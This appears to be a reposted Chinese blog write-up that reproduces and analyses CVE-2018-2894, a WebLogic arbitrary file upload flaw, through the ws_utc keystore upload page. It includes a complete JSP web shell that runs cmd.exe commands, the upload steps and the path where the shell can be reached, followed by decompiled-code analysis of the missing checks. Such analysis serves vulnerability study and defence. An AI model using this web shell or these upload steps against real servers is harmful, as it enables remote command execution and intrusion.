WebLogic任意文件上传漏洞复现与分析 -CVE-2018-2894

Posted py7hon

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WebLogic任意文件上传漏洞复现与分析 -CVE-2018-2894 相关的知识,希望对你有一定的参考价值。

CVE-2018-2894

漏洞影响版本:10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3

下载地址:http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip

漏洞复现

服务启动后,访问 http://localhost:7001/ws_utc/config.do

技术分享图片

可以将当前的工作目录为更改为其他目录。以本地环境为例,可以部署到C:OracleMiddlewareOracle_Homeuser_projectsdomainsase_domainserversAdminServer mp\_WL_internalcom.oracle.webservices.wls.ws-testclient-app-wls4mcj4ywar

选择右边的安全栏目,添加JKS Keystores上传文件。假设chybeta.jsp内容如下:

<%@ page import="java.util.*,java.io.*,java.net.*"%>
<html><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "
<BR>");
        Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); disr = dis.readLine(); }
        }
%>
</pre>
</BODY></HTML>

抓包获取到时间戳1531987145013,则上传到的位置即configkeystore1531987145013_chybeta.jsp

技术分享图片

访问http://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp

技术分享图片

简要漏洞分析

ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59:

public void changeWorkDir(String path) {
    String[] oldPaths = this.getRelatedPaths();
    if (this.testPageProvider.getWsImplType() == ImplType.JRF) {
        this.isWorkDirChangeable = false;
        this.isWorkDirWritable = isDirWritable(path);
        this.isWorkDirChangeable = true;
        this.setTestClientWorkDir(path);
    } else {
        this.persistWorkDir(path);
        this.init();
    }

    if (this.isWorkDirWritable) {
        String[] newPaths = this.getRelatedPaths();
        moveDirs(oldPaths, newPaths);
    } else {
        Logger.fine("[INFO] Newly specified TestClient Working Dir is readonly. Won‘t move the configuration stuff to new path.");
    }

}

此函数用于改变工作目录,但其中并未做任何检测。

ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181中:

@Path("/keystore")
    @POST
    @Produces({"application/xml", "application/json"})
    @Consumes({"multipart/form-data"})
    public Response editKeyStoreSettingByMultiPart(FormDataMultiPart formPartParams) {
        if (!RequestUtil.isRequstedByAdmin(this.request)) {
            return Response.status(Status.FORBIDDEN).build();
        } else {
            if (TestClientRT.isVerbose()) {
                Logger.fine("calling SettingResource.addKeyStoreSettingByMultiPart");
            }

            String currentTimeValue = "" + (new Date()).getTime();
            KeyValuesMap<String, String> formParams = RSDataHelper.getInstance().convertFormDataMultiPart(formPartParams, true, TestClientRT.getKeyStorePath(), currentTimeValue);
            ....
        }
    }

跟入ws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31

public static String getKeyStorePath() {
        return getConfigDir() + File.separator + "keystore";
    }

得到要写入的路径storePath

ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145:

public KeyValuesMap<String, String> convertFormDataMultiPart(FormDataMultiPart formPartParams, boolean isExtactAttachment, String path, String fileNamePrefix) {
    ...
    if (attachName != null && attachName.trim().length() > 0) {
        if (attachName != null && attachName.trim().length() != 0) {
            attachName = this.refactorAttachName(attachName);
            if (fileNamePrefix == null) {
                fileNamePrefix = key;
            }

            String filename = (new File(storePath, fileNamePrefix + "_" + attachName)).getAbsolutePath();
            kvMap.addValue(key, filename);
            if (isExtactAttachment) {
                this.saveAttachedFile(filename, (InputStream)bodyPart.getValueAs(InputStream.class));
            }
        }
    } 
    ...
}

把上传文件的内容传到了storePath目录里,文件名满足fileNamePrefix + "_" + attachName。这过程没有任何过滤和检查:)...

条件:

以上是关于WebLogic任意文件上传漏洞复现与分析 -CVE-2018-2894 的主要内容,如果未能解决你的问题,请参考以下文章

漏洞复现Weblogic 任意文件上传漏洞

漏洞复现Weblogic 任意文件上传漏洞

Weblogic 任意文件上传漏洞(CVE-2018-2894)

CVE-2019-2618任意文件上传漏洞复现

CVE-2019-2618任意文件上传漏洞复现

Weblogic 任意文件上传漏洞(CVE-2018-2894)